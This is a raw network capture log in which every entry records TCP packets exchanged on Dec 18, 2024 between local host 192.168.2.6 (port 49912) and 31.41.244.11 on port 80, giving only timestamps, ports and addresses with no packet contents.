                                                                                                                                                                  Dec 18, 2024 11:09:31.046978951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.048583031 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.048593998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.048607111 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.048650980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.048650980 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.049619913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.049632072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.049645901 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.049715996 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.049715996 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.051388025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.051399946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.051486015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.052505016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.052516937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.052527905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.052583933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.052583933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.053795099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.053806067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.053818941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.053858042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.053858042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.054512978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.054548979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.054636002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.054676056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.056462049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.056473017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.056484938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.056512117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.056651115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.057539940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.057552099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.057595015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.057595015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.058476925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.058492899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.058505058 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.058521986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.058609962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.059746027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.059763908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.059789896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.059931040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.060498953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.060512066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.060590982 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.061357021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.061403990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.061532974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.061604023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.062624931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.062638044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.062674046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.063370943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.063383102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.063416004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.064649105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.064661980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.064713001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.064713001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.065886974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.065898895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.065936089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.066531897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.066545010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.066595078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.066595078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.067383051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.067394972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.067675114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.203687906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.203705072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.203821898 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.203859091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.203958988 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.203972101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.204062939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.204895973 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.204946995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.205213070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.205287933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.205851078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.205897093 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.206249952 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.206298113 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.206851006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.206871033 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.206901073 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.206901073 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.207977057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.208134890 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.208482027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.208530903 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.209530115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.209542036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.209588051 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.209852934 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.209928989 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.210062981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.210107088 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.211373091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.211385012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.211419106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.212985992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.212996006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.213007927 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.213028908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.213179111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.213378906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.213499069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.214087963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.214099884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.214131117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.215373039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.215384007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.215517998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.216612101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.216819048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.220742941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.220966101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.221137047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.221230030 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.221251011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.221339941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.221354008 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.221415043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.222060919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.222157001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.222259998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.222301006 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.223119974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.223165035 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.223166943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.223244905 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.224189997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.224201918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.224281073 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.225011110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.225188017 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.225385904 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.225442886 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.226968050 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.226979971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.226990938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.227034092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.227034092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.227101088 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.227241993 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.228163958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.228174925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.228312969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.229626894 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.229639053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.229701042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.230288982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.230300903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.230376959 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.230871916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.230990887 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.231281042 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.231379032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.231848955 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.231882095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.231920004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.231920004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.232934952 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.232947111 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.233030081 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.233999014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.234010935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.234085083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.235002995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.235014915 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.235044003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.235093117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.236148119 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.236160994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.236191034 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.236903906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.236916065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.236949921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.237797976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.237843037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.237961054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.237999916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.238883018 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.238895893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.238949060 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.239979029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.240273952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.240335941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.240426064 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.240930080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.240942001 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.241197109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.241780996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.241792917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.241851091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.242809057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.242862940 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.243233919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.243283987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.243908882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.243921041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.243973017 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.244628906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.244673967 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.244704962 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.244756937 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.245804071 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.245816946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.245883942 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.246880054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.246891975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.246925116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.247668982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.247680902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.247755051 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.248723030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.248735905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.248771906 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.248799086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.249516010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.249562025 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.249891996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.250214100 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.250539064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.250551939 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.250597000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.251545906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.251559019 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.251672029 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.252638102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.252650023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.252700090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.253504038 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.253854990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.253942966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.254010916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.254501104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.254513979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.254612923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.255506039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.255676985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.255965948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.256030083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.256669044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.256680012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.256833076 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.257492065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.257628918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.257756948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.257854939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.258519888 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.258532047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.258663893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.396368027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.396471024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.396517992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.396517992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.396703005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.396713972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.396960020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.397526979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.397538900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.397620916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.398695946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.398710012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.398798943 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.399362087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.399374008 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.399427891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.399427891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.399446964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.399586916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.399605036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.399714947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.400234938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.400324106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.400347948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.400397062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.401323080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.401369095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.401396990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.401448011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.402380943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.402393103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.403333902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.403357983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.403372049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.403419018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.403419018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.403734922 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.403744936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.404078007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.404932976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.404944897 CET804991231.41.244.11192.168.2.6
